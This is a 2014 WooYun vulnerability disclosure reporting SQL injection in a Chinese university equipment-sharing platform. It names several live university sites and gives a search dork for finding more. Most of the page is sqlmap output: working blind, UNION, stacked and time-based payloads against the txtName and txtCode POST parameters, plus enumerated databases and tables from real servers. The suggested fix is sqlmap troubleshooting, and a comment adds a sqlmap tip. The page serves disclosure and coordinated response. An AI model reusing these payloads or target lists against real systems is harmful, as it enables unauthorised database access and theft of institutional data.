当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062534

漏洞标题:某通用型教育学院仪器管理平台存在SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者:

提交时间:2014-05-28 12:59

修复时间:2014-08-26 13:00

公开时间:2014-08-26 13:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-28: 细节已通知厂商并且等待厂商处理中
2014-06-01: 厂商已经确认,细节仅向厂商公开
2014-06-04: 细节向第三方安全合作伙伴开放
2014-07-26: 细节向核心白帽子及相关领域专家公开
2014-08-05: 细节向普通白帽子公开
2014-08-15: 细节向实习白帽子公开
2014-08-26: 细节向公众公开

简要描述:

某通用型教育学院仪器管理平台存在SQL注入

详细说明:

1.厂商名称:南京先极科技有限公司
2.官网:http://www.changedu.com/
3.产品名称:大型仪器设备开放共享管理平台
4.官网展示该平台案例:
q1.jpg






q2.jpg






q3.jpg






q4.jpg






q5.jpg


google and baidu 搜索:大型仪器设备开放共享管理平台
或者inurl:ShowFiles/BookEquList.aspx
列举几例仅供cncert测试:
http://eq.njfu.edu.cn/ShowFiles/BookEquList.aspx?用户单位:南京林业大学
http://210.29.132.248/ShowFiles/BookEquList.aspx?用户单位:南京师范大学化学与材料科学学院
http://sjjx.njit.edu.cn/sy/share/ShowFiles/BookEquList.aspx?用户单位:南京工程学院
http://web168444.5udns.cn/ShowFiles/BookEquList.aspx?用户单位:也是南京师范的
http://ies.hhit.edu.cn/ShowFiles/BookEquList.aspx? 用户单位:淮海工学院
都是在预约列表-搜素仪器处

c1.jpg


c3.jpg


POST注入,漏洞文件:ShowFiles/BookEquList.aspx?(txtCode 仪器编号跟 txtName 仪器名称 参数都存在注入)
以南京林业大学为例:

c5.jpg

http://eq.njfu.edu.cn/ShowFiles/BookEquList.aspx
post数据:__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&txtName=s&txtksdate=&txtjsdate=&ImageButton1.x=35&ImageButton1.y=14&txtye=


---
Place: POST
Parameter: txtName
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&tx
tName=s'; IF(5707=5707) SELECT 5707 ELSE DROP FUNCTION ZYzh--&txtksdate=&txtjsda
te=&ImageButton1.x=35&ImageButton1.y=14&txtye=
    Type: UNION query
    Title: Generic UNION query (NULL) - 77 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&tx
tName=s' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(105)+CHAR(99)+CHAR(
105)+CHAR(113)+CHAR(114)+CHAR(78)+CHAR(105)+CHAR(77)+CHAR(78)+CHAR(101)+CHAR(65)
+CHAR(115)+CHAR(98)+CHAR(76)+CHAR(113)+CHAR(101)+CHAR(109)+CHAR(105)+CHAR(113),N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &txtksdate=&txtjsdate=&ImageButton1.x=3
5&ImageButton1.y=14&txtye=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&tx
tName=s'; WAITFOR DELAY '0:0:5'--&txtksdate=&txtjsdate=&ImageButton1.x=35&ImageB
utton1.y=14&txtye=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&tx
tName=s' WAITFOR DELAY '0:0:5'--&txtksdate=&txtjsdate=&ImageButton1.x=35&ImageBu
tton1.y=14&txtye=
---
[16:14:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


available databases [13]:
[*] cs
[*] db_ldyl
[*] db_nldhxgc
[*] db_qcyy
[*] master
[*] model
[*] msdb
[*] NL_ArtDesign
[*] NL_LargeEquipment
[*] NL_TreeStatisticsData
[*] Northwind
[*] pubs
[*] tempdb


Database: NL_LargeEquipment
[59 tables]
+-------------------------+
| T_BookEquFund           |
| T_BookRecord            |
| T_BookRiZhi             |
| T_CardUseLog            |
| T_ChangeShuaKa          |
| T_DsCardUseLog          |
| T_EquipPrincipal        |
| T_FMessage              |
| T_FinanceSide           |
| T_Log                   |
| T_LunWenImport          |
| T_LunWenImport          |
| T_News                  |
| T_Relation              |
| T_RelationSubject       |
| T_RelationSubjectSystem |
| T_RunningAccount        |
| T_SMessage              |
| T_XueYuan               |
| T_Yqwx                  |
| T_ZhuanYe               |
| dtproperties            |
| shuaka_ip               |
| sysconstraints          |
| syssegments             |
| t_ChangeRecord          |
| t_DataDic               |
| t_DicUserid             |
| t_bigxk                 |
| t_bookEquipment         |
| t_cyplan1               |
| t_cyplan1               |
| t_equipmentDetail       |
| t_equipmentDetail       |
| t_equipmentType         |
| t_equstate              |
| t_experiment            |
| t_files                 |
| t_flag                  |
| t_folder                |
| t_fujian                |
| t_fyrecord              |
| t_gzry                  |
| t_hourse                |
| t_ip                    |
| t_lable                 |
| t_message               |
| t_project               |
| t_rulekf                |
| t_test                  |
| t_user                  |
| t_user                  |
| t_xfrecord              |
| t_xmyq                  |
| t_zone                  |
| v_RunningAccount        |
| xi                      |
| xueyuan                 |
| zhuanye                 |
+-------------------------+

漏洞证明:

南京工程学院
http://sjjx.njit.edu.cn/sy/share/ShowFiles/BookEquList.aspx
post:__VIEWSTATE=%2FwEPDwUKLTMzNDAzNDE1Mg9kFgICAw9kFgQCBg8WAh4LXyFJdGVtQ291bnQCBRYKAgEPZBYCZg8VCAnkvZnlkI7nv5QSMjAxMy0zLTI1IDE3OjMwOjE5CDAwMDI2Njg0Kk1QU%2BaooeWdl%2BWMlueUn%2BS6p%2BWKoOW3peezu%2Be7n%2BaVmeWtpuiuvuWkhxAyMDEzLTAzLTExIDA5OjMwEDIwMTMtMDMtMTEgMTA6MzAJ546L5LqR5aKeDOetieW%2BheWuoeaguGQCAg9kFgJmDxUICeiWm%2BS6muWGmxEyMDEzLTMtMTEgOTozMDoxOQgwMDAyNjY4NCpNUFPmqKHlnZfljJbnlJ%2FkuqfliqDlt6Xns7vnu5%2FmlZnlraborr7lpIcQMjAxMy0wMy0xMyAwODozMBAyMDEzLTAzLTEzIDExOjMwAAzlrqHmoLjpgJrov4dkAgMPZBYCZg8VCAnnpZ3kuLnnpaUSMjAxMy0zLTI0IDEwOjMwOjE5CDAwMDI3MTA3KuWNmuS4luWKm%2BWjq%2BS5kOawlOWKqOaVmeWtpuWfueiureijhee9rkRTMxAyMDEzLTAzLTEwIDA5OjAwEDIwMTMtMDMtMTAgMTE6MDAJ546L5a6P5LyfDOetieW%2BheWuoeaguGQCBA9kFgJmDxUICeaIkOaZk%2BW9pBEyMDEzLTMtMjQgODozMDoxOQgwMDAyNjg2OC9GTVPmn5TmgKfmqKHlnZfljJbnlJ%2Fkuqfns7vnu58tLeacuuWZqOS6uuWNleWFgxAyMDEzLTAzLTI5IDA4OjAwEDIwMTMtMDMtMjkgMTA6MDAG6ZmI5YCpDOetieW%2BheWuoeaguGQCBQ9kFgJmDxUICeW8uuS7gemcnhEyMDEzLTMtMjIgODozMDoxOQgwMDAyNzAyNSrljZrkuJblipvlo6vkuZDmtrLljovmlZnlrabln7norq3oo4Xnva5EUzQQMjAxMy0wNC0wOCAxMDowMBAyMDEzLTA0LTA4IDEyOjAwCeWxheWbveaJjQznrYnlvoXlrqHmoLhkAgcPFgIeB1Zpc2libGVoFgJmD2QWAmYPZBYKAgcPDxYCHgRUZXh0BQExZGQCCQ8PFgQfAgUP56ys5LiA6aG1Jm5ic3A7HgdFbmFibGVkaGRkAgoPDxYEHwIFFSZuYnNwO%2BS4iuS4gOmhtSZuYnNwOx8DaGRkAgsPDxYCHwNoZGQCDQ8PFgIfA2hkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMSW1hZ2VCdXR0b24xrmuq2hIrjllOd073CzfiKLNhXLs%3D&username=&txtName=s&txtCode=&txtksdate=&txtjsdate=&ImageButton1.x=36&ImageButton1.y=11&__EVENTVALIDATION=%2FwEWBwK0%2BuTVBgKvpuq2CALEhISFCwLChPzDDQK1wNu3DwK1wM%2F8AQLSwpnTCBdnN9Rua7Hd0N4MHlER6%2F7tC6b2

available databases [11]:
[*] master
[*] model
[*] msdb
[*] ngc_jingsai
[*] NJGC_ChuangXin
[*] NJGC_lw
[*] NJGC_SY
[*] NJGC_Teach
[*] Northwind
[*] pubs
[*] tempdb


Database: NJGC_SY
[192 tables]
+-------------------------+
| T_Bg1                   |
| T_Bg3                   |
| T_Bg6                   |
| T_BookRecord            |
| T_BookRiZhi             |
| T_ChangeShuaKa          |
| T_ChangeShuaKakq        |
| T_FMessage              |
| T_HzOld1                |
| T_HzOld2                |
| T_HzOld3                |
| T_HzOld4                |
| T_HzOld5                |
| T_HzOld6                |
| T_HzOld7                |
| T_HzOld8                |
| T_JsRole                |
| T_Log                   |
| T_News                  |
| T_PingJia               |
| T_RenWuShu              |
| T_SMessage              |
| T_UserDetail            |
| T_YhpCk                 |
| T_YhpRk                 |
| T_YihaoPing             |
| T_Yqwx                  |
| T_YuSuan                |
| T_ZhiBiao               |
| T_change_kb             |
| T_jwjh                  |
| T_jwjh20140113sun       |
| T_kbjsvalue             |
| T_ChangeShuaKakq(ceshi) |
| area                    |
| bigxkname               |
| centuser                |
| centuser2               |
| cssun                   |
| dtproperties            |
| fjuser                  |
| kebiaorq                |
| kebiaoxz                |
| kebiaozc                |
| province                |
| shuaka_ip               |
| smallxkname             |
| sqlmapoutput            |
| sys_DataDic             |
| sys_privilege           |
| sysconstraints          |
| syssegments             |
| t_ChangeRecord          |
| t_ChangeRecordold       |
| t_KeBiaoXMQz            |
| t_bg2                   |
| t_bg4                   |
| t_bg7                   |
| t_bg8                   |
| t_bigxk                 |
| t_bookEquipment         |
| t_canshu                |
| t_changerecordjs        |
| t_chengjiRate           |
| t_class                 |
| t_course                |
| t_coursexy              |
| t_didian                |
| t_drKbs                 |
| t_drkb                  |
| t_drkbxs                |
| t_equipment             |
| t_equipmentDetail       |
| t_equipmentType         |
| t_equipmentsb           |
| t_equjxxx               |
| t_experiment            |
| t_fbxm                  |
| t_files                 |
| t_flag                  |
| t_folder                |
| t_fyrecord              |
| t_gj                    |
| t_hourse                |
| t_jiaocai               |
| t_jmyqdata              |
| t_jmyqdatasb            |
| t_jsxyid                |
| t_kbfzjs                |
| t_kbxs                  |
| t_kbxsvalue             |
| t_kcchengji             |
| t_kcsj                  |
| t_kcxkxsqr              |
| t_kcxkxsqr2             |
| t_kebiao                |
| t_kebiao_20140113sun    |
| t_kebiaovalue           |
| t_key                   |
| t_keyan                 |
| t_lable                 |
| t_lilun                 |
| t_links                 |
| t_message               |
| t_procent               |
| t_profj                 |
| t_project               |
| t_projs                 |
| t_propc                 |
| t_rigisterUser          |
| t_rulekf                |
| t_ryqx                  |
| t_sbxm                  |
| t_sjbigxk               |
| t_sjcgjl                |
| t_sjdate                |
| t_sjwhcd                |
| t_sjzcdata              |
| t_skyxtime              |
| t_smallxk               |
| t_sqsy                  |
| t_sqyyvalue             |
| t_sybg                  |
| t_sycentlist            |
| t_synews                |
| t_sysjbqkdata           |
| t_sysys                 |
| t_temp                  |
| t_user                  |
| t_userother             |
| t_xfrecord              |
| t_xk                    |
| t_xkxs                  |
| t_xmchengji             |
| t_xmvalue               |
| t_xmyq                  |
| t_xsinsertlab           |
| t_xskbscore             |
| t_xsteam                |
| t_xsteam2               |
| t_xueqi                 |
| t_xwlujin               |
| t_year                  |
| t_yhkxq                 |
| t_yqbx                  |
| t_yykbaddr              |
| t_yyshiyan              |
| t_yysyxs                |
| t_ziyuan                |
| t_zone                  |
| v_huizongRSS            |
| v_huizong_4             |
| v_hzjob                 |
| v_jsskxylist            |
| v_jsxyxslist            |
| v_kbxslist              |
| v_kebiao                |
| v_message               |
| v_messageddhf           |
| v_messagejs             |
| v_messagejsgxygly       |
| v_messagelookhf         |
| v_messagexs             |
| v_sqxm                  |
| v_sysys                 |
| v_teacher               |
| v_weekkcgs              |
| v_xkxslist              |
| v_xscjaddfind           |
| v_xskblist              |
| v_xsyqlist              |
| v_xueji                 |
| v_xycourse              |
| v_xyjiaocai             |
| v_xyproject             |
| v_xyziyuan              |
| v_yqbx                  |
| v_yykbsjdd              |
| v_yyshiyan              |
| v_yysyShlist            |
| v_yysylist              |
| v_yysylistzt            |
| workshuaka              |
| xiti                    |
| xiti_xs                 |
| xkname                  |
| xueji                   |
| xueyuan                 |
| xxx                     |
| yuxi                    |
| yuxi_xsjg               |
| zhuanye                 |
+-------------------------+

修复方案:

不知道是不是环境问题
有的post参数过长,我在Windows XP下的sqlmap运行会拒绝访问
但是删减一些又会提示错误,跑不出数据
linux下sqlmap应该不会有这个问题吧?

版权声明:转载请注明来源 @乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-06-01 23:04

厂商回复:

CNVD确认并复现所述情况,由CNVD协调教育网信息中心处置涉及学校网站,并通过公开渠道联系软件生产厂商南京先极科技有限公司通报处置。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-08-26 14:53 | Vigoss_Z ( 普通白帽子 | Rank:404 漏洞数:63 | 楞娃)

    .net viewstate不完整肯定会报错的。sqlmap -r参数可以解决参数过长。

  2. 2014-08-26 18:07 | anting ( 普通白帽子 | Rank:105 漏洞数:38 | 活到老,学到老)

    受教

  3. 2014-08-26 21:47 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    @Vigoss_Z 恩 已经知道了 之前不知道。。。

  4. 2014-12-11 13:00 | sin ( 实习白帽子 | Rank:38 漏洞数:2 | 寻找最优雅的解决方案)

    @魇 为嘛我发现手里的洞,有些和你高度重复.